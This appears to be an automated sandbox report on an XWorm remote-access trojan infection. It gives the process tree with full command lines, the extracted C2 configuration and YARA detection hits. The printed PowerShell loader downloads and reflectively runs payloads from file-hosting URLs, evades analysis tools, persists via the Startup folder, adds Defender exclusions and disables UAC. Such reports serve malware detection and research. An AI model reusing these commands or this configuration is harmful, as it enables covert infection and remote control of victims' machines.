powershell.exe (PID: 2080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF | Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7088 cmdline: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL01.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

PING.EXE (PID: 7092 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)

cmd.exe (PID: 7076 cmdline: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL02.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

PING.EXE (PID: 6916 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)

cmd.exe (PID: 6192 cmdline: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL31.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

PING.EXE (PID: 928 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)

cmd.exe (PID: 7032 cmdline: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 6864 cmdline: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)

WmiPrvSE.exe (PID: 7648 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 5216 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6804 cmdline: cmd.exe /k reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

reg.exe (PID: 7160 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7772 cmdline: cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7792 cmdline: powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7192 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7800 cmdline: cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7872 cmdline: powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7904 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8164 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\cxtyy.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 6936 cmdline: #by-unknown MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 7956 cmdline: cmd.exe /c del "C:\Users\user\AppData\Local\Temp\x.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

svchost.exe (PID: 7396 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cmd.exe (PID: 8588 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8644 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8764 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qtglm.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 8852 cmdline: #by-unknown MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 8864 cmdline: #by-unknown MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 9024 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 9068 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 9076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 9196 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\tezxb.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 8236 cmdline: #by-unknown MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 2472 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1740 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6072 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\bweyr.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 3588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 8632 cmdline: #by-unknown MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 944 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5960 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 9060 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\bnltz.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 1060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 2076 cmdline: #by-unknown MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["expresswealthz.duckdns.org"], "Port": 3911, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aa4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b41:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c56:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8752:$cnc4: POST / HTTP/1.1
00000029.00000002.2133873133.000002002C6C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000029.00000002.2133873133.000002002C6C4000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x13746c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x137509:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13761e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13711a:$cnc4: POST / HTTP/1.1
00000039.00000002.2339225011.00000117DE7E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000039.00000002.2339225011.00000117DE7E4000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x11b76c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11b809:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11b91e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11b41a:$cnc4: POST / HTTP/1.1
00000031.00000002.2238659527.0000026C579E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000031.00000002.2238659527.0000026C579E4000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x13a6cc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x13a769:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13a87e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13a37a:$cnc4: POST / HTTP/1.1
0000001C.00000002.1894952447.0000022801A23000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001C.00000002.1894952447.0000022801A23000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xdb204:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xdb2a1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xdb3b6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xdaeb2:$cnc4: POST / HTTP/1.1
00000031.00000002.2238659527.0000026C57CE7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000031.00000002.2238659527.0000026C57CE7000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x893c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89d9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8aee:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x85ea:$cnc4: POST / HTTP/1.1
0000002D.00000002.2121324006.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000002D.00000002.2121324006.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7814:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x78b1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x79c6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x74c2:$cnc4: POST / HTTP/1.1
00000040.00000002.2420990292.00000208005B6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000040.00000002.2420990292.00000208005B6000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x139b8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x139c29:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x139d3e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13983a:$cnc4: POST / HTTP/1.1
0000001C.00000002.1894952447.0000022801CC4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001C.00000002.1894952447.0000022801CC4000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x975c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x97f9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x990e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x940a:$cnc4: POST / HTTP/1.1
00000029.00000002.2133873133.000002002C9C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000029.00000002.2133873133.000002002C9C3000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa78c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa829:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa93e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa43a:$cnc4: POST / HTTP/1.1
00000040.00000002.2420990292.00000208008B8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000040.00000002.2420990292.00000208008B8000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8f8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9029:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x913e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8c3a:$cnc4: POST / HTTP/1.1
Process Memory Space: powershell.exe PID: 2080	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
